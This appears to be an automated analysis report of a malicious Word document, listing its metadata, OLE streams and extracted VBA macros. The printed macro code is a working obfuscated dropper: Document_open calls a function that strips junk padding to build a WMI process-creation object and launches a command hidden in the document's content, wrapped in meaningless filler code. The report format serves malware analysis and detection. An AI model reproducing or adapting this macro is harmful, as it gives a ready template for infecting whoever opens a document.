Title:	Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia.
Subject:
Author:	Gabriel Villaseor
Keywords:
Comments:
Template:
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-25 08:47:00
Last Saved Time:	2021-01-25 08:47:00
Number of Pages:	1
Number of Words:	5614
Number of Characters:	32003
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	266
Number of Paragraphs:	75
Thumbnail Scaling Desired:	False
Company:	Velzquez - Rodrquez
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Gp0t5ucwnkng7fi, Stream Size: 14586

General
Stream Path:	Macros/VBA/Gp0t5ucwnkng7fi
VBA File Name:	Gp0t5ucwnkng7fi
Stream Size:	14586
Data ASCII:	. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . < . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 3c 11 59 83 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
YXgZLBuTI
Const
LFmsHlGJO
xMeNBMA
Error
huzCVaAnM
ybkwIF
mFRDA:
HzpNhFB)
LXmiCH
Split(uwcdCFcFJ,
ndrons
jqLUKf
UrnhFG
dtPsGEOG
nUxeKfi
Resume
SdueDATuJ
buaHCHyIN
VlJBAxsF)
rlKxF
snBUla:
ZcbWFy
MvCNCxeRC
Split(VVDiBADws,
uUNTnPDJ:
QNBiBDJF)
cskzymBH
Array((rlKxF),
Split(UupSwG,
snBUla
XDCYoHErU:
KJKIF
mFRDA
QFCSIz
mxkikw
CtnVB
Array((TYMfJE),
eRlxboGG
"ndpns
wbcoCJA
pqwm,
vMqQFsCmr
NxyDdD
jmprxcAGG
SRadpEcF)
Split(AEpDpJGH,
ZhuxR
QNBiBDJF
Array((bTSPCh),
aEMwHJJ()
xcFaA()
UupSwG
vmuBOT()
PDgjIDCIF
wbcoCJA)
Range:
DReLBGD
"high,critic"
Array((mQUInscCB),
YYiqHCrBJ
bwTdFGH
dtPsGEOG:
ppqanE)
LJgRGnI()
rnfVw()
VVDiBADws
HzpNhFB
mjbBYHhbs
aEMwHJJ
uQDVbE)
Split(LYEtDJDB,
TYMfJE
BZLGJ
AeZXCL
yqmFHJvF
SOBiDVBG
FCnAjUBF:
rQMlbCDj()
PmHbFtBA
XxDunFI:
Array((uFHXMGsDH),
Array((UrnhFG),
zgEErH
TziQbRH
Array((SdueDATuJ),
wAZjcaDbE
yifdCzUX
Nothing
Array((vQbVHTJ),
Split(buaHCHyIN,
FCnAjUBF
ppqanE
QFCSIz()
zPYsAGBC
wPuUI
Split(TfZstIBWb,
Split(TQutDNlhF,
FwMLnnSxs
gPxXF
nmoAspl
IUtVX
uFHXMGsDH
AeZXCL)
LJgRGnI
yVlwI
vmuBOT
Split(NxyDdD,
nd:wns
yVlwI()
xdoxB:
Array((SOBiDVBG),
BBnudDV)
kTIuCnPI
Split(IcBqyoTE,
Array((JNPIBwzJy),
bTSPCh
ZtlVi
DJesE:
upIoDlhH
AnoeDGEY
Array((rwAdJC),
GKCGI:
ndgmns
nQutDRr
nmoAspl)
GyemVIEQ
Array((ZcbWFy),
String
XfKDE
zPYsAGBC:
Split(DReLBGD,
ndinns
DpdIEHHc
LYEtDJDB
TziQbRH)
cCNkM
XxDunFI
IfvyDH
Array((AjzpdH),
jEGWECK()
Mid(skuwd,
Target)
jqLUKf()
MNzdmO
jEGWECK
Split(yqmFHJvF,
KDRcGw()
JNPIBwzJy
MtSXGFAwF
kTIuCnPI()
xcFaA
mbdQXnNAJ
OQtflfHc
XDCYoHErU
Split(mbdQXnNAJ,
eRlxboGG:
cCNkM:
ndtns
Len(skuwd))
uUNTnPDJ
Array((upIoDlhH),
PmHbFtBA)
Array((wPuUI),
dmJpUJBT
eJIkEagfC
AjzpdH
jmprxcAGG)
OtpOArK
VZXgAzj:
EZSQT
Split(ybkwIF,
PDgjIDCIF:
ndmns
uwcdCFcFJ
Attribute
zImEIFI
GKCGI
HfUXFJwF
Split(MtSXGFAwF,
Array((LFmsHlGJO),
Nkemmqfhxex
OQtflfHc:
LcJWChpF
ndsns
xdoxB
GhFhH
OAFQFBEFa()
eFfcEAI
vMqQFsCmr)
OAFQFBEFa
mQUInscCB
xJhvfW
Mid(Application.Name,
ENgVDEnDI
jbkkjHHCd
VB_Name
xJhvfW)
Content
xMeNBMA()
QttEc
TmgVHr
BZLGJ)
mbLvUI)
SRadpEcF
Function
uHhldyVW
Split(AnoeDGEY,
Split(LXmiCH,
auKzIlBI()
BBnudDV
qJJnPFoNQ
AEpDpJGH
zzXfBb
bwTdFGH:
Split(XfKDE,
zImEIFI:
UTUqCwyI
rwAdJC
rQMlbCDj
cskzymBH:
Array((QttEc),
KDRcGw
DJesE
nd_ns
rnfVw
uQDVbE
IcBqyoTE
sInuFuLII
Array((vXvXQH),
LgSUu()
iJkmJG
Array((gPxXF),
LcJWChpF:
VlJBAxsF
jKGrEhAE
MNzdmO()
mbLvUI
jKGrEhAE()
vQbVHTJ
TQutDNlhF
auKzIlBI
wAZjcaDbE)
LgSUu
Split(zzXfBb,
sInuFuLII)
VZXgAzj
Split(iJkmJG,
TmgVHr()
jbkkjHHCd)
vXvXQH
dmJpUJBT:
Split(DpdIEHHc,
HfUXFJwF()
String:
Array((huzCVaAnM),
Array((OtpOArK),
qJJnPFoNQ()
TfZstIBWb
skuwd
eJIkEagfC)

VBA Code

Attribute VB_Name = "Gp0t5ucwnkng7fi"
Function Xusmagx95iuck_o3o()
   GoTo snBUla
    Const AjzpdH As String = "A"
    Const jbkkjHHCd As String = ","
    Const yqmFHJvF As String = "*high*,*critic*"
    Dim FwMLnnSxs As Range: Set FwMLnnSxs = Array((AjzpdH), Target)
    If FwMLnnSxs Is Nothing Then
    End If
    Dim rnfVw() As String: rnfVw = Split(yqmFHJvF, jbkkjHHCd)
snBUla:
skuwd = Nkemmqfhxex + U765y5vgf_ao0faq . Content + Dt5ebejo9lypr_3vmp
   GoTo uUNTnPDJ
    Const wPuUI As String = "A"
    Const QNBiBDJF As String = ","
    Const TfZstIBWb As String = "*high*,*critic*"
    Dim GyemVIEQ As Range: Set GyemVIEQ = Array((wPuUI), Target)
    If GyemVIEQ Is Nothing Then
    End If
    Dim kTIuCnPI() As String: kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)
uUNTnPDJ:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
   GoTo dtPsGEOG
    Const mQUInscCB As String = "A"
    Const PmHbFtBA As String = ","
    Const NxyDdD As String = "*high*,*critic*"
    Dim ENgVDEnDI As Range: Set ENgVDEnDI = Array((mQUInscCB), Target)
    If ENgVDEnDI Is Nothing Then
    End If
    Dim TmgVHr() As String: TmgVHr = Split(NxyDdD, PmHbFtBA)
dtPsGEOG:
A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
   GoTo bwTdFGH
    Const ZcbWFy As String = "A"
    Const jmprxcAGG As String = ","
    Const uwcdCFcFJ As String = "*high*,*critic*"
    Dim GhFhH As Range: Set GhFhH = Array((ZcbWFy), Target)
    If GhFhH Is Nothing Then
    End If
    Dim auKzIlBI() As String: auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)
bwTdFGH:
Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
   GoTo FCnAjUBF
    Const upIoDlhH As String = "A"
    Const BZLGJ As String = ","
    Const DpdIEHHc As String = "*high*,*critic*"
    Dim yifdCzUX As Range: Set yifdCzUX = Array((upIoDlhH), Target)
    If yifdCzUX Is Nothing Then
    End If
    Dim vmuBOT() As String: vmuBOT = Split(DpdIEHHc, BZLGJ)
FCnAjUBF:
Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
   GoTo dmJpUJBT
    Const LFmsHlGJO As String = "A"
    Const VlJBAxsF As String = ","
    Const DReLBGD As String = "*high*,*critic*"
    Dim IUtVX As Range: Set IUtVX = Array((LFmsHlGJO), Target)
    If IUtVX Is Nothing Then
    End If
    Dim LgSUu() As String: LgSUu = Split(DReLBGD, VlJBAxsF)
dmJpUJBT:
C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v
   GoTo cskzymBH
    Const QttEc As String = "A"
    Const sInuFuLII As String = ","
    Const ybkwIF As String = "*high*,*critic*"
    Dim YYiqHCrBJ As Range: Set YYiqHCrBJ = Array((QttEc), Target)
    If YYiqHCrBJ Is Nothing Then
    End If
    Dim jEGWECK() As String: jEGWECK = Split(ybkwIF, sInuFuLII)
cskzymBH:
Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)
   GoTo GKCGI
    Const JNPIBwzJy As String = "A"
    Const xJhvfW As String = ","
    Const MtSXGFAwF As String = "*high*,*critic*"
    Dim CtnVB As Range: Set CtnVB = Array((JNPIBwzJy), Target)
    If CtnVB Is Nothing Then
    End If
    Dim QFCSIz() As String: QFCSIz = Split(MtSXGFAwF, xJhvfW)
GKCGI:
Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)
   GoTo OQtflfHc
    Const vXvXQH As String = "A"
    Const BBnudDV As String = ","
    Const AnoeDGEY As String = "*high*,*critic*"
    Dim nUxeKfi As Range: Set nUxeKfi = Array((vXvXQH), Target)
    If nUxeKfi Is Nothing Then
    End If
    Dim LJgRGnI() As String: LJgRGnI = Split(AnoeDGEY, BBnudDV)
OQtflfHc:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Zr9iedzfw6nr(mxkikw)
   GoTo zImEIFI
    Const TYMfJE As String = "A"
    Const ppqanE As String = ","
    Const zzXfBb As String = "*high*,*critic*"
    Dim YXgZLBuTI As Range: Set YXgZLBuTI = Array((TYMfJE), Target)
    If YXgZLBuTI Is Nothing Then
    End If
    Dim qJJnPFoNQ() As String: qJJnPFoNQ = Split(zzXfBb, ppqanE)
zImEIFI:
Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad
   GoTo LcJWChpF
    Const uFHXMGsDH As String = "A"
    Const wbcoCJA As String = ","
    Const UupSwG As String = "*high*,*critic*"
    Dim IfvyDH As Range: Set IfvyDH = Array((uFHXMGsDH), Target)
    If IfvyDH Is Nothing Then
    End If
    Dim HfUXFJwF() As String: HfUXFJwF = Split(UupSwG, wbcoCJA)
LcJWChpF:
End Function
Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)
On Error Resume Next
   GoTo XDCYoHErU
    Const OtpOArK As String = "A"
    Const mbLvUI As String = ","
    Const iJkmJG As String = "*high*,*critic*"
    Dim uHhldyVW As Range: Set uHhldyVW = Array((OtpOArK), Target)
    If uHhldyVW Is Nothing Then
    End If
    Dim OAFQFBEFa() As String: OAFQFBEFa = Split(iJkmJG, mbLvUI)
XDCYoHErU:
N21io7rxzal10t = Pdkbu8b4a_ucmmy2
   GoTo PDgjIDCIF
    Const vQbVHTJ As String = "A"
    Const SRadpEcF As String = ","
    Const mbdQXnNAJ As String = "*high*,*critic*"
    Dim ZhuxR As Range: Set ZhuxR = Array((vQbVHTJ), Target)
    If ZhuxR Is Nothing Then
    End If
    Dim xcFaA() As String: xcFaA = Split(mbdQXnNAJ, SRadpEcF)
PDgjIDCIF:
L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)
   GoTo zPYsAGBC
    Const gPxXF As String = "A"
    Const vMqQFsCmr As String = ","
    Const IcBqyoTE As String = "*high*,*critic*"
    Dim UTUqCwyI As Range: Set UTUqCwyI = Array((gPxXF), Target)
    If UTUqCwyI Is Nothing Then
    End If
    Dim MNzdmO() As String: MNzdmO = Split(IcBqyoTE, vMqQFsCmr)
zPYsAGBC:
Zr9iedzfw6nr = L4jc0swehya
   GoTo mFRDA
    Const huzCVaAnM As String = "A"
    Const nmoAspl As String = ","
    Const AEpDpJGH As String = "*high*,*critic*"
    Dim EZSQT As Range: Set EZSQT = Array((huzCVaAnM), Target)
    If EZSQT Is Nothing Then
    End If
    Dim aEMwHJJ() As String: aEMwHJJ = Split(AEpDpJGH, nmoAspl)
mFRDA:
End Function
Function Sotm_c8dqxel(Tw8vu7dybjhd)
   GoTo eRlxboGG
    Const UrnhFG As String = "A"
    Const AeZXCL As String = ","
    Const LYEtDJDB As String = "*high*,*critic*"
    Dim MvCNCxeRC As Range: Set MvCNCxeRC = Array((UrnhFG), Target)
    If MvCNCxeRC Is Nothing Then
    End If
    Dim jqLUKf() As String: jqLUKf = Split(LYEtDJDB, AeZXCL)
eRlxboGG:
   GoTo DJesE
    Const bTSPCh As String = "A"
    Const eJIkEagfC As String = ","
    Const XfKDE As String = "*high*,*critic*"
    Dim eFfcEAI As Range: Set eFfcEAI = Array((bTSPCh), Target)
    If eFfcEAI Is Nothing Then
    End If
    Dim jKGrEhAE() As String: jKGrEhAE = Split(XfKDE, eJIkEagfC)
DJesE:
   GoTo xdoxB
    Const rlKxF As String = "A"
    Const TziQbRH As String = ","
    Const VVDiBADws As String = "*high*,*critic*"
    Dim nQutDRr As Range: Set nQutDRr = Array((rlKxF), Target)
    If nQutDRr Is Nothing Then
    End If
    Dim rQMlbCDj() As String: rQMlbCDj = Split(VVDiBADws, TziQbRH)
xdoxB:
Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)
   GoTo VZXgAzj
    Const rwAdJC As String = "A"
    Const HzpNhFB As String = ","
    Const buaHCHyIN As String = "*high*,*critic*"
    Dim KJKIF As Range: Set KJKIF = Array((rwAdJC), Target)
    If KJKIF Is Nothing Then
    End If
    Dim xMeNBMA() As String: xMeNBMA = Split(buaHCHyIN, HzpNhFB)
VZXgAzj:
   GoTo XxDunFI
    Const SdueDATuJ As String = "A"
    Const wAZjcaDbE As String = ","
    Const TQutDNlhF As String = "*high*,*critic*"
    Dim ZtlVi As Range: Set ZtlVi = Array((SdueDATuJ), Target)
    If ZtlVi Is Nothing Then
    End If
    Dim yVlwI() As String: yVlwI = Split(TQutDNlhF, wAZjcaDbE)
XxDunFI:
   GoTo cCNkM
    Const SOBiDVBG As String = "A"
    Const uQDVbE As String = ","
    Const LXmiCH As String = "*high*,*critic*"
    Dim zgEErH As Range: Set zgEErH = Array((SOBiDVBG), Target)
    If zgEErH Is Nothing Then
    End If
    Dim KDRcGw() As String: KDRcGw = Split(LXmiCH, uQDVbE)
cCNkM:
End Function

VBA File Name: Ht_h_pv5qq7taeoe3a, Stream Size: 705

General
Stream Path:	Macros/VBA/Ht_h_pv5qq7taeoe3a
VBA File Name:	Ht_h_pv5qq7taeoe3a
Stream Size:	705
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 3c 11 fb 95 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"`

VBA File Name: U765y5vgf_ao0faq, Stream Size: 1173

General
Stream Path:	Macros/VBA/U765y5vgf_ao0faq
VBA File Name:	U765y5vgf_ao0faq
Stream Size:	1173
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . n . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 3c 11 6e d2 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Name
VB_Creatable
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "U765y5vgf_ao0faq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Xusmagx95iuck_o3o
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 316

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	316
Entropy:	3.13931601016
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 0c 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	520
Entropy:	3.91439426516
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6885

General
Stream Path:	1Table
File Type:	data
Stream Size:	6885
Entropy:	6.0189512257
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	527
Entropy:	5.52643349927
Base64 Encoded:	True
Data ASCII:	I D = " { 3 4 8 2 5 3 8 1 - 3 9 1 5 - 4 2 D 7 - B C E B - D B 4 B F 3 B 3 B 9 D 0 } " . . D o c u m e n t = U 7 6 5 y 5 v g f _ a o 0 f a q / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H t _ h _ p v 5 q q 7 t a e o e 3 a . . M o d u l e = G p 0 t 5 u c w n k n g 7 f i . . E x e N a m e 3 2 = " H n g q q _ v j w m d " . . N a m e = " $ $ " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 E 2 C C 8 F 6 4 8 3 E 2 8 4 2 2 8 4 2 2 8 4 2 2 8 4 2 "
Data Raw:	49 44 3d 22 7b 33 34 38 32 35 33 38 31 2d 33 39 31 35 2d 34 32 44 37 2d 42 43 45 42 2d 44 42 34 42 46 33 42 33 42 39 44 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 0d 0a 4d 6f 64 75 6c 65 3d 47 70 30 74 35 75 63 77 6e 6b 6e

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	158
Entropy:	3.75971549021
Base64 Encoded:	False
Data ASCII:	U 7 6 5 y 5 v g f _ a o 0 f a q . U . 7 . 6 . 5 . y . 5 . v . g . f . _ . a . o . 0 . f . a . q . . . H t _ h _ p v 5 q q 7 t a e o e 3 a . H . t . _ . h . _ . p . v . 5 . q . q . 7 . t . a . e . o . e . 3 . a . . . G p 0 t 5 u c w n k n g 7 f i . G . p . 0 . t . 5 . u . c . w . n . k . n . g . 7 . f . i . . . . .
Data Raw:	55 37 36 35 79 35 76 67 66 5f 61 6f 30 66 61 71 00 55 00 37 00 36 00 35 00 79 00 35 00 76 00 67 00 66 00 5f 00 61 00 6f 00 30 00 66 00 61 00 71 00 00 00 48 74 5f 68 5f 70 76 35 71 71 37 74 61 65 6f 65 33 61 00 48 00 74 00 5f 00 68 00 5f 00 70 00 76 00 35 00 71 00 71 00 37 00 74 00 61 00 65 00 6f 00 65 00 33 00 61 00 00 00 47 70 30 74 35 75 63 77 6e 6b 6e 67 37 66 69 00 47 00 70 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4832

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4832
Entropy:	5.49501263006
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 643

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	643
Entropy:	6.34732268372
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . c . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
Data Raw:	01 7f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 be 63 fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 97248

